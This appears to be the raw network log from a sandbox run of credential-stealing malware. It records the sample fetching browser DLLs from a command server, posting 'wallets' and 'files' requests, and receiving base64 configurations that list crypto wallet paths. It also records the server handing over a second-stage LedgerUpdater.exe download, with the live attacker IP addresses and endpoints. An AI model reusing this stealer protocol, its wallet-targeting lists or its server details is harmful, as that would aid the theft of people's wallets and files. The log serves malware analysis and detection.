Nov 2, 2024 17:56:54.247634888 CET	1236	IN	Data Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01 Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
Nov 2, 2024 17:56:54.247648001 CET	1236	IN	Data Raw: 00 00 00 0f 57 c8 0f 11 8c 0e 9c 00 00 00 83 c1 20 83 c3 fe 75 a6 eb 02 31 c9 f6 c2 01 74 28 0f 10 04 0f 0f 10 4c 0e 0c 0f 57 c8 0f 10 84 0e 8c 00 00 00 0f 11 4c 0e 0c 0f 10 0c 0f 0f 57 c8 0f 11 8c 0e 8c 00 00 00 31 db 8b 55 ac 39 c2 74 6b f6 c2 Data Ascii: W u1t(LWLW1U9tkt0T0U19t<f.0L0L0LL09uM17L^_[]USWVh1
Nov 2, 2024 17:56:54.247659922 CET	1236	IN	Data Raw: f0 8d 86 00 ff ff ff 3d 00 ff ff ff 77 0a 68 0e e0 ff ff e9 d0 00 00 00 8b 45 08 85 c0 0f 84 c0 00 00 00 8d 9d f0 fe ff ff 68 00 01 00 00 68 20 21 08 10 50 e8 28 f9 07 00 83 c4 0c bf 00 01 00 00 0f 1f 80 00 00 00 00 56 ff 75 0c 53 e8 0f f9 07 00 Data Ascii: =whEhh !P(VuS)9wWuSufDT>\>=t%>>f1h
Nov 2, 2024 17:56:54.247673035 CET	1236	IN	Data Raw: 45 d0 0f 84 a4 00 00 00 89 55 e0 89 5d dc 8b 45 ec 04 01 89 4d d4 0f b6 c8 8a 5d e8 8b 55 f0 8a 24 0a 00 e3 0f b6 f3 8b 55 f0 8a 3c 32 8b 55 f0 88 3c 0a 8b 55 f0 88 24 32 00 e7 0f b6 f7 8b 4d 10 8a 21 8b 4d f0 32 24 31 8b 4d d4 8b 55 e4 88 22 ba Data Ascii: EU]EM]U$U<2U<U$2M!M2$1MU")UtDEU$U<2U<U$2MaM2$1MUbu-]En~uMMUEEM]}7
Nov 2, 2024 17:56:54.247755051 CET	1236	IN	Data Raw: 04 0f 82 3a 03 00 00 0f b6 c9 89 4d ec 31 c0 89 d1 89 7d e4 89 5d dc 66 0f 1f 84 00 00 00 00 00 89 45 e8 8b 55 e4 8b 04 02 89 45 d4 8b 45 e8 8b 55 ec 8d 44 02 01 89 d3 0f b6 c0 8b 7d f0 0f b6 14 07 00 d1 0f b6 f1 8a 34 37 88 34 07 88 14 37 00 d6 Data Ascii: :M1}]fEUEEUD}4747EED}4}4EUEUu}<7}<U2u4EUU}4}
Nov 2, 2024 17:56:54.248286963 CET	1236	IN	Data Raw: 01 cb 8b 52 14 89 95 3c ff ff ff 8b 4e 0c 89 8d a8 fe ff ff 11 d1 8b 46 28 89 85 c8 fe ff ff 01 c3 89 5d d4 8b 46 2c 89 85 cc fe ff ff 11 c1 8b 7e 4c 31 cf 8b 46 48 31 d8 81 f7 8c 68 05 9b 35 1f 6c 3e 2b 89 fb 81 c3 3b a7 ca 84 89 5d dc 89 c6 81 Data Ascii: R<NF(]F,~L1FH1h5l>+;]gu33`tSUSU`UM11UTEEMM11E`tS
Nov 2, 2024 17:56:54.248333931 CET	1236	IN	Data Raw: 5d 80 11 d9 89 4d f0 8b 75 a4 31 ce 89 75 a4 8b 8d 54 ff ff ff 31 c1 89 8d 54 ff ff ff 8b 45 e8 01 f0 89 45 e8 8b 7d c0 11 cf 31 c2 31 fb 89 d0 0f a4 d8 08 0f a4 d3 08 8b 8d 74 ff ff ff 8b 71 68 89 b5 24 ff ff ff 8b 55 b8 01 f2 8b 71 6c 89 b5 5c Data Ascii: ]Mu1uT1TEE}11tqh$Uql\MUMT1M1UMuuM11UMtBpTMRtdEpMxEU1U}1}E
Nov 2, 2024 17:56:56.298718929 CET	92	OUT	GET /1d1758bf3d6d1a39/mozglue.dll HTTP/1.1 Host: 62.204.41.163 Cache-Control: no-cache
Nov 2, 2024 17:56:56.575962067 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:56 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "94750-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Nov 2, 2024 17:56:57.906112909 CET	93	OUT	GET /1d1758bf3d6d1a39/msvcp140.dll HTTP/1.1 Host: 62.204.41.163 Cache-Control: no-cache
Nov 2, 2024 17:56:58.173921108 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:58 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "6dde8-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Nov 2, 2024 17:56:59.737502098 CET	89	OUT	GET /1d1758bf3d6d1a39/nss3.dll HTTP/1.1 Host: 62.204.41.163 Cache-Control: no-cache
Nov 2, 2024 17:57:00.005795002 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:56:59 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "1f3950-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Nov 2, 2024 17:57:02.516587019 CET	93	OUT	GET /1d1758bf3d6d1a39/softokn3.dll HTTP/1.1 Host: 62.204.41.163 Cache-Control: no-cache
Nov 2, 2024 17:57:02.785871029 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:02 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "3ef50-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Nov 2, 2024 17:57:03.409802914 CET	97	OUT	GET /1d1758bf3d6d1a39/vcruntime140.dll HTTP/1.1 Host: 62.204.41.163 Cache-Control: no-cache
Nov 2, 2024 17:57:03.677645922 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:03 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 10:49:08 GMT ETag: "13bf0-5e7ebd4425100" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Nov 2, 2024 17:57:04.252640963 CET	201	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBFBKKJECAKEHJJJDBAF Host: 62.204.41.163 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Nov 2, 2024 17:57:04.531955957 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 2, 2024 17:57:04.607897043 CET	467	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHC Host: 62.204.41.163 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 43 46 43 47 48 49 44 48 43 41 4b 45 42 46 43 46 48 43 2d 2d 0d 0a Data Ascii: ------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KECFCGHIDHCAKEBFCFHCContent-Disposition: form-data; name="message"wallets------KECFCGHIDHCAKEBFCFHC--
Nov 2, 2024 17:57:04.879518032 CET	1236	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Nov 2, 2024 17:57:04.882535934 CET	465	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEG Host: 62.204.41.163 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 2d 2d 0d 0a Data Ascii: ------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="message"files------KJEBKJDAFHJDGDHJKKEG--
Nov 2, 2024 17:57:05.154253960 CET	247	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 44 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 6b 6c 4d 52 56 4e 38 4a 55 52 46 55 30 74 55 54 31 41 6c 58 48 77 71 4c 6e 52 34 64 48 77 78 4d 48 77 78 66 44 46 38 4d 48 77 3d Data Ascii: RklMRVN8JURFU0tUT1AlXHwqLnR4dHwxMHwxfDF8MHw=
Nov 2, 2024 17:57:05.305355072 CET	202	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHIJJDGDHDGDAKFIECFI Host: 62.204.41.163 Content-Length: 98199 Connection: Keep-Alive Cache-Control: no-cache
Nov 2, 2024 17:57:05.911866903 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:05 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Nov 2, 2024 17:57:05.971162081 CET	472	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGD Host: 62.204.41.163 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="message"ybncbhylepme------BAKFBKEHDBGHJJKFIEGD--
Nov 2, 2024 17:57:06.245068073 CET	298	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:06 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 72 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 33 4e 69 34 78 4d 54 4d 75 4d 54 45 31 4c 6a 49 78 4e 53 39 4d 5a 57 52 6e 5a 58 4a 56 63 47 52 68 64 47 56 79 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4d 6e 77 3d Data Ascii: aHR0cDovLzE3Ni4xMTMuMTE1LjIxNS9MZWRnZXJVcGRhdGVyLmV4ZXwwfDB8U3RhcnR8Mnw=
Nov 2, 2024 17:57:07.754476070 CET	472	OUT	POST /c882d91d1df1bdb3.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIIIIEHCFIECAKFHJD Host: 62.204.41.163 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 63 39 65 33 35 38 33 33 33 33 35 66 38 38 33 62 38 30 31 39 37 35 65 63 30 63 64 39 36 38 65 30 32 61 63 37 37 36 66 37 31 36 35 64 66 35 30 36 63 38 34 64 61 34 32 61 36 61 63 64 31 61 38 65 33 38 37 64 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 49 49 45 48 43 46 49 45 43 41 4b 46 48 4a 44 2d 2d 0d 0a Data Ascii: ------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="token"3c9e35833335f883b801975ec0cd968e02ac776f7165df506c84da42a6acd1a8e387ddb3------GDHIIIIEHCFIECAKFHJDContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GDHIIIIEHCFIECAKFHJD--
Nov 2, 2024 17:57:08.030127048 CET	202	IN	HTTP/1.1 200 OK Date: Sat, 02 Nov 2024 16:57:07 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=87 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	50055	176.113.115.215	80	6456	C:\Users\user\Desktop\DbMBWMxoNv.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 17:57:06.253129005 CET	83	OUT	GET /LedgerUpdater.exe HTTP/1.1 Host: 176.113.115.215 Cache-Control: no-cache
